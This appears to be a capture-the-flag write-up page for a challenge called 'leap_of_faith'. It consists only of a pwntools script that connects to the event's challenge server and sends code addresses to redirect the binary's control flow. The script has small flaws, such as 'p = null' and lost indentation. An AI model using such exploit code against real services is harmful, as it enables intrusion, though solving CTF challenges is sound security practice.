leap_of_faith









Last updated









Last updated
from pwn import *
local = 0
p = null
elf = ELF('./chall')
gdbsc = """
b *0x40125B
b *0x401182
b *0x4011ba
c
"""
if not local:
p = remote('kashictf.iitbhucybersec.in', 33765)
else:
p = process('./chall')
gdb.attach(p, gdbscript=gdbsc)
for i in range(8):
p.sendline(b'0x40125E')
p.sendline(b'0x4011ba')
p.interactive()